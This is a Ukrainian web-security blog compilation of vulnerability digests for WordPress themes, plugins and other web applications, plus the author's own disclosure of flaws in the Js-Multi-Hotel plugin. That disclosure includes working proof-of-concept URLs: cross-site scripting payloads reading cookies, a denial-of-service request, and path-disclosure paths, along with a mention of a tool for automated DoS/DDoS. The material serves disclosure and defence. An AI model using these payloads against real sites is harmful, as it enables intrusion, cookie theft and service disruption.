Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Blogfolio, Folo та Easy Career Openings. Для котрих з’явилися експлоіти. Blogfolio - це тема движка, Folo - це тема движка, Easy Career Openings - це плагін для створення списку вакансій.

• WordPress Blogfolio Shell Upload (деталі)
• WordPress Folo Theme Cross Site Scripting (деталі)
• WordPress Easy Career Openings SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У березні, 21.03.2014, я виявив Abuse of Functionality, Denial of Service, Cross-Site Scripting та Full path disclosure уразливості в плагіні Js-Multi-Hotel для WordPress. Про що найближчим часом повідомлю розробникам. Це друга частина уразливостей в цьому плагіні, а з часом я оприлюдню інші дірки.

Раніше я писав про XSS і FPD уразливості в Js-Multi-Hotel для WordPress. Стосовно плагінів для WordPress перед цим я писав про уразливості в VideoWhisper Live Streaming Integration для WP.

Abuse of Functionality (WASC-42):

http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site&w=1&h=1

DoS (WASC-10):

http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site/big_file&h=1&w=1

Окрім проведення DoS атак вручну, також можна проводити автоматизовані DoS і DDoS атаки з використанням DAVOSET.

Cross-Site Scripting (WASC-08):

http://site/wp-content/plugins/js-multihotel/includes/delete_img.php?path=%3Cbody%20onload=with(document)alert(cookie)%3E

Про XSS уразливість в refreshDate.php в параметрі roomid я вже писав раніше.

Full path disclosure (WASC-13):

http://site/wp-content/plugins/js-multihotel/includes/functions.php
http://site/wp-content/plugins/js-multihotel/includes/myCalendar.php
http://site/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=
http://site/wp-content/plugins/js-multihotel/includes/show_image.php
http://site/wp-content/plugins/js-multihotel/includes/widget.php
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/GdThumb.inc.php
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/thumb_plugins/gd_reflection.inc.php

Уразливі Js-Multi-Hotel 2.2.1 та попередні версії.

В даній добірці уразливості в веб додатках:

• Dell PacketTrap MSP RMM 6.6.x - Multiple Persistent Web Vulnerabilities (деталі)
• Remote Code Execution in Microweber (деталі)
• SQL Injection in appRain (деталі)
• Cross-Site Scripting (XSS) in Zikula Application Framework (деталі)
• Xpient Cash Drawer Operation Vulnerability (деталі)

У березні, 21.03.2014, я виявив Cross-Site Scripting та Full path disclosure уразливості в плагіні Js-Multi-Hotel для WordPress. Про що найближчим часом повідомлю розробникам.

Стосовно плагінів для WordPress раніше я писав про уразливості в VideoWhisper Live Streaming Integration для WordPress.

Я знайшов численні уразливості в цьому плагіні. Ось XSS та FPD уразливості, а з часом оприлюдню інші дірки.

Cross-Site Scripting (WASC-08):

http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=%3C%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=http://

Уразливі Js-Multi-Hotel 2.2.1 та попередні версії.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Pinboard, Blogggie та Jigoshop. Для котрих з’явилися експлоіти. Pinboard - це тема движка, Blogggie - це тема движка, Jigoshop - це e-commerce плагін для створення онлайн-магазину.

• WordPress Pinboard Shell Upload (деталі)
• WordPress Blogggie Shell Upload (деталі)
• wordpress jigoshop Plugin path disclosure vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• EMC Avamar Multiple Vulnerabilities (деталі)
• Multiple vulnerabilities in Drupal (деталі)
• NewsAktuell PressePortal DE - Remote SQL Injection Web Vulnerability (деталі)
• Hash Length Extension in HTMLPurifier (деталі)
• HP System Management Homepage (SMH) running on Linux and Windows, Multiple Remote and Local Vulnerabilities (деталі)

В даній добірці уразливості в веб додатках:

• HP Database and Middleware Automation (DMA) using SSL, Remote Disclosure of Information (деталі)
• Mybb Ajaxfs Plugin Sql Injection vulnerability (деталі)
• Open-Xchange Security Advisory 2013-11-25 (деталі)
• Multiple vulnerabilities in Bugzilla (деталі)
• Multiple vulnerabilities in IceWarp Mail Server (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Elemin, iFolo та Js-Multi-Hotel. Для котрих з’явилися експлоіти. Elemin - це тема движка, Folo - це тема движка, Js-Multi-Hotel - це плагін для створення системи резервації місць у готелях.

• WordPress Elemin Shell Upload (деталі)
• WordPress Folo Shell Upload (деталі)
• WordPress Js-Multi-Hotel 2.2.1 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Huawei E587 3G Mobile Hotspot Command Injection (деталі)
• Apache Commons FileUpload vulnerability (деталі)
• PHP-Nuke 8.2.4 multiple vulnerabilities (деталі)
• EMC Document Sciences xPression Multiple Vulnerabilities (деталі)
• Huawei E587 3G Mobile Hotspot Web UI Cross Site Scripting vulnerability (деталі)

В даній добірці уразливості в веб додатках:

• Dell Kace 1000 SMA 5.4.742 - SQL Injection Vulnerabilities (деталі)
• spip security update (деталі)
• Vulnerability in Apache mod_fcgid (деталі)
• Apache XML Security for Java vulnerability (деталі)
• Dell Kace 1000 SMA v5.4.70402 - Persistent Vulnerabilities (деталі)